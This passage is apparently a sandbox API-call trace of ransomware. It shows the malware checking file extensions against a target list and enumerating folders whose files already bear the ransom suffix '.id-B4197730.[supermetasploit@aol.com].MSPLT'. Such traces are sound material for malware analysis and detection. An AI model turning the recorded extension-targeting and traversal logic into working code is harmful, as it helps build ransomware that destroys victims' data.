(lpString1=".mp3", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mp4") returned 4 [0283.338] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mpeg") returned 5 [0283.338] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0283.338] lstrlenW (lpString=".mpg") returned 4 [0283.338] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mpv") returned 4 [0283.338] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0283.338] lstrlenW (lpString=".mrw") returned 4 [0283.338] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".msg") returned 4 [0283.339] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".mxl") returned 4 [0283.339] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".myd") returned 4 [0283.339] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".myi") returned 4 [0283.339] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".nef") returned 4 [0283.339] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".nrw") returned 4 [0283.339] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".obj") returned 4 [0283.339] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".odb") returned 4 [0283.339] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".odc") returned 4 [0283.339] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".odm") returned 4 [0283.339] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".odp") returned 4 [0283.339] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".ods") returned 4 [0283.339] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".oft") returned 4 [0283.339] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".one") returned 4 [0283.339] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0283.339] lstrlenW (lpString=".onepkg") returned 7 [0283.339] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0283.339] lstrlenW (lpString=".onetoc2") returned 8 [0283.339] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0283.340] lstrlenW (lpString=".opt") returned 4 [0283.340] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".oqy") returned 4 [0283.340] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".orf") returned 4 [0283.340] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".p12") returned 4 [0283.340] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".p7b") returned 4 [0283.340] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".p7c") returned 4 [0283.340] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pam") returned 4 [0283.340] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pbm") returned 4 [0283.340] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pct") returned 4 [0283.340] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pcx") returned 4 [0283.340] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pdd") returned 4 [0283.340] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pdf") returned 4 [0283.340] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pdp") returned 4 [0283.340] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pef") returned 4 [0283.340] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0283.340] lstrlenW (lpString=".pem") returned 4 [0283.341] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".pff") returned 4 [0283.341] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".pfm") returned 4 [0283.341] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".pfx") returned 4 [0283.341] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".pgm") returned 4 [0283.341] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".php") returned 4 [0283.341] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".php3") returned 5 [0283.341] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0283.341] lstrlenW (lpString=".php4") returned 5 [0283.341] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0283.341] lstrlenW (lpString=".php5") returned 5 [0283.341] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0283.341] lstrlenW (lpString=".phtml") returned 6 [0283.341] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0283.341] lstrlenW (lpString=".pict") returned 5 [0283.341] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0283.341] lstrlenW (lpString=".pl") returned 3 [0283.341] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0283.341] lstrlenW (lpString=".pls") returned 4 [0283.341] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0283.341] lstrlenW (lpString=".pm") returned 3 [0283.341] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0283.341] lstrlenW (lpString=".png") returned 4 [0283.341] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".pnm") returned 4 [0283.342] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".pot") returned 4 [0283.342] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".potm") returned 5 [0283.342] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".potx") returned 5 [0283.342] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".ppa") returned 4 [0283.342] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".ppam") returned 5 [0283.342] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".ppm") returned 4 [0283.342] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".pps") returned 4 [0283.342] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".ppsm") returned 5 [0283.342] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".ppt") returned 4 [0283.342] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".pptm") returned 5 [0283.342] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".pptx") returned 5 [0283.342] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0283.342] lstrlenW (lpString=".prn") returned 4 [0283.342] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".ps") returned 3 [0283.342] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0283.342] lstrlenW (lpString=".psb") returned 4 [0283.342] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".psd") returned 4 [0283.342] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0283.342] lstrlenW (lpString=".pst") returned 4 [0283.343] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0283.343] lstrlenW (lpString=".ptx") returned 4 [0283.343] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0283.343] lstrlenW (lpString=".pub") returned 4 [0283.343] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0283.343] lstrlenW (lpString=".pwm") returned 4 [0283.343] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0283.343] lstrlenW (lpString=".pxr") returned 4 [0283.343] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0283.343] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59b65b6b, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59b65b6b, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59b8ac04, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x122e6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.343] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59f90d55, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59f90d55, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0294f3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.343] FindNextFileW (in: hFindFile=0x48a1b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59f90d55, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59f90d55, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0294f3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4458, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.343] FindClose (in: hFindFile=0x48a1b0 | out: hFindFile=0x48a1b0) returned 1 [0283.344] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0283.344] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1028", cAlternateFileName="")) returned 1 [0283.345] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x4000730 [0283.345] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.515] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59f712d4, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f712d4, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.606] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59b8ac04, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59b8ac04, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59f44f1e, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1994, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.606] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59d2e758, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59d2e758, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59d54819, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xee96, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.606] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0033b8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0033b8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0033b8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.607] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0033b8, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0033b8, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a0033b8, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x3858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.607] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.608] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4000730 | out: hHeap=0x470000) returned 1 [0283.608] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1029", cAlternateFileName="")) returned 1 [0283.608] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.609] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.611] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.613] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59d7a9ee, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59d7a9ee, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59d7a9ee, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xf74, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.613] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59ded2ec, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59ded2ec, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59ded2ec, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x13d46, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.614] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0294f3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0294f3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a04f7b3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.614] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a0294f3, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a0294f3, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a04f7b3, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.614] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.615] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.615] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1030", cAlternateFileName="")) returned 1 [0283.615] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.615] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.621] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.621] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e13571, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e13571, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e13571, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xde4, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.621] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x59e396ae, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x59e396ae, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x59e396ae, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x130b6, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="LocalizedData.xml.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="LOCALI~1.MSP")) returned 1 [0283.621] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a28baaa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a28baaa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2b1e4c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 1 [0283.621] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a28baaa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a28baaa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a2b1e4c, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x4858, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="SetupResources.dll.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="SETUPR~1.MSP")) returned 0 [0283.622] FindClose (in: hFindFile=0x48a8b0 | out: hFindFile=0x48a8b0) returned 1 [0283.623] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0283.623] FindNextFileW (in: hFindFile=0x48a130, lpFindFileData=0x385fa7c | out: lpFindFileData=0x385fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe84, dwReserved1=0xffffcb96, cFileName="1031", cAlternateFileName="")) returned 1 [0283.623] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xfffe) returned 0x54cee8 [0283.623] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1031\\*", lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName=".", cAlternateFileName="")) returned 0x48a8b0 [0283.626] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a09bbd7, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="..", cAlternateFileName="")) returned 1 [0283.626] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5a09bbd7, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x5a09bbd7, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x5a1a6d8f, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0xe44, dwReserved0=0xffffe795, dwReserved1=0xa84, cFileName="eula.rtf.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="EULART~1.MSP")) returned 1 [0283.626] FindNextFileW (in: hFindFile=0x48a8b0, lpFindFileData=0x385f800 | out: lpFindFileData=0x385f800*(dwFileAttributes=0x80, 